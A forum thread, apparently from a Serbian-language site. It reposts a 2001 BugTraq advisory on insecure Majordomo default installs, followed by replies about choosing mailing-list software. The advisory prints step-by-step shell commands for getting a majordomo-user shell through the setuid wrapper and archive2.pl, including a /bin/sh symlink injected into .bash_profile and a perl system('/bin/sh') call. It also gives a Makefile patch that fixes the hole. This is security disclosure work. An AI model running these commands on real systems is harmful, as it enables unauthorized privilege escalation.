Majordomo

Pri tome da se obrati pa�nja na security, posebno ukoliko je ma�ina visekorisni�ka


Preuzeto sa BUGTRAQ:
ps: na kraju za prilo�en i patch fajl ...

>>>-------- ISECI ISPOD
To: BugTraq
Subject: Majordomo default vulns
Date: Sep 14 2001 11:24AM
Author: Marco van Berkum <[email protected]>

Hi,
I found something to discuss, this time involving majordomo.
This was tested on a Slackware linux 8.0 (kernel 2.4.8);
majordomo version 1.94.4, I also tested the other versions
and all _default_ installs had the same problem, note that
the versions 1.94.1 an 1.94.2 should NOT be used anymore,
those are way more simple to exploit.

We all know that if you install majordomo you should
CAREFULLY read the INSTALL file, simply because else
you will have a security problem. Only I doubt that everyone
actually follows the guidelines. Besides that, I feel that
Majordomodevelopers _could_ make a more secure default
install without affecting the functionality of the program.
A simple patch would _at least_ stop the possiblities which
are descibed below.

Also I did not find in the documents that majordomo should
have a shell (so give it a nologin or whatever, it works fine
without shell).

An example:

Who am i
marco@anubis:~$ id -a
uid=1001(marco) gid=100(users) groups=100(users)

This could happen if you give it a /home/majordomo

marco@anubis:~$ ls -al /home/|grep majordomo
drwxr-x--x 6 majordom daemon 4096 Sep 13 23:50 majordomo/

Suidbit + executable for everyone (this is where the patch comes in)

marco@anubis:~$ ls -al ~majordomo/wrapper
-rwsr-xr-x 1 root daemon 16451 Aug 31 13:51
/home/majordomo/wrapper*

This is the program I'm going to abuse

marco@anubis:~$ ls -al ~majordomo/archive2.pl
-rwxr-xr-x 1 majordom daemon 5234 Aug 31 13:51
/home/majordomo/archive2.pl*

Make a template

marco@anubis:~$ echo "ln -s /bin/sh ~/majordomo/sh 2>/dev/null">test

Append majordomo's .bash_profile (or .profile etc..) with your template
using buggy archive2.pl (yes, not wrapper is buggy here, archive2.pl is,
that one can use /'s, I need wrapper for becoming user majordomo
though).

marco@anubis:~$ ~majordomo/wrapper archive2.pl -f .bash_profile -a
~marco/test

Now hit the .bash_profile (sometimes the majordomo admin might need it
and do the same).

marco@anubis:~$ su - majordomo
Password:
majordomo@anubis:~$ id -a
uid=666(majordomo) gid=2(daemon) groups=2(daemon)
majordomo@anubis:~$ exit

See if it worked

marco@anubis:~$ ls -al ~majordomo/sh
lrwxrwxrwx 1 majordom daemon 7 Sep 13 23:57
/home/majordomo/sh -> /bin/sh*

Jupz it worked, now someone could abuse it, let's do that.

marco@anubis:~$ ~majordomo/wrapper sh
sh-2.05$ id -a
uid=666(majordomo) gid=2(daemon) groups=100(users)
sh-2.05$

Ok, I'm majordomo.

Also, in the README file is described how one could debug majordomo.

<quote>
Finally, if you're up to mucking around in the perl code, symlinking
perl into ~majordomo and invoking it via wrapper will give you a debug
environment with Majordomo's permissions and view of the world:

~majordomo% ./wrapper perl -d majordomo
</quote>

Well, same problem :)
Dont forget to remove the symlink or else everyone can do this:

marco@anubis:~$ /home/majordomo/wrapper perl
system("/bin/sh");
^D
sh-2.04$

One could append the perlfiles to make them execute your evil code of
course since the archive2 program appends. This could give a majordomo
uid/daemon gid shell.

The main point here is that we can write to majordomo owned files to
simply alter data in the lists or score a shell (and obtaining a daemon
gid).
reading the INSTALL file carefully will help you to prevent this, but I
prefer to apply a patch before starting the installation to make sure
that
the wrapper is not executable for everyone (it _should_ have 4750 and
not 4755).

--- simple patch to make default install more secure ---

--- Makefile.orig Fri Sep 14 09:43:45 2001
+++ Makefile Fri Sep 14 09:44:20 2001
@@ -42,7 +42,7 @@
# change these values!
WRAPPER_OWNER = root
WRAPPER_GROUP = $(W_GROUP)
-WRAPPER_MODE = 4755
+WRAPPER_MODE = 4750
POSIX = -DPOSIX_UID=$(W_USER) -DPOSIX_GID=$(W_GROUP)
# Otherwise, if your system is NOT POSIX (e.g. SunOS 4.x, SGI Irix 4,
# HP DomainOS) then comment out the above four lines and uncomment

just my 2 cents,
grtz,
Marco van Berkum
--
GCC dpu s:--- a- C+++ US++++ P++ L+++ E---- W N o-- K w---
O- M-- V-- PS+++ PE-- Y+ PGP--- t--- 5 X R* tv++ b+++ DI-- D----
G++ e- h+ r y*
+---------------------+------------------+-------------------+
| Marco van Berkum | MB17300-RIPE | Security Engineer |
| http://ws.obit.nl | "Chernobyl used | Network Admin |
| [email protected] | Windows" | UNIX |
+---------------------+------------------+-------------------+



<<<<---- KRAJ ISE�KA

Jedna rec - mailman!

sto se time toliko zamjavate kad imate yahoogropus....jednostavno do dzadza

Pa ja ne znam. da li oni ubacuju reklame?
Uostalom, ovako je sladje, lepse a i ponesto naucis....
Kada bi mi neko dao da biram yahoogroups ili da setujem moju mailing listu, izabrao bih ovo drugo, samo zbog vece slobode.

Imam ja ekstra Perl mail listu hsmail.
Imas jedan glavni .pl fajl, variable fajl i mail.txt fajl. Kada udjes u admin sekciju imas jedan veliki text box i kucaj do mile volje.
Naravno mozes i da brises korisnike. I jeb.. one free mail liste, treba ti samo server koji podrzava barem Perl 5.00

Majordomo, Minordomo i Malone(mailman :) ) traze vise nego sto ja imam na raspolaganju kod hosting provajdera (verat). A to je samo cgi-bin folder i podrsku za perl/php/mysql, nista od usr/local/sbin ili kompajliranje C koda...

Jel moze neko da mi preporuci neku pristojnu skriptu koja radi bilo kako, izgubih se u moru besplatnih skripti, a nemam vremena da sam razvijem, Yahoo Stop!
:)

Hvala unapred...

eNewsletter Manager - FREE - Extra prosto za upotrebu, instalira se na kompu, poput e-mail klijenta, sam pravis baze mailova jednostavnim upisom, besplatno je i RADI!

Samo upisi u pretrazivac ime, ne secam se gde sam ga skinuo.

Hvala na odgovoru, pogledacu, mada mi je naziv vrlo sumnjiv: "eNewsletter Manager" ipak zvuci kao program za Newsletter, a ne za mailing listu.

Dodatno pitanje za kolege koji su preporucili, majordomo, minordomo i mailman.

Gde mogu neki od tih skriptova da hostujem?

PHPList

http://tincan.co.uk/?lid=294

..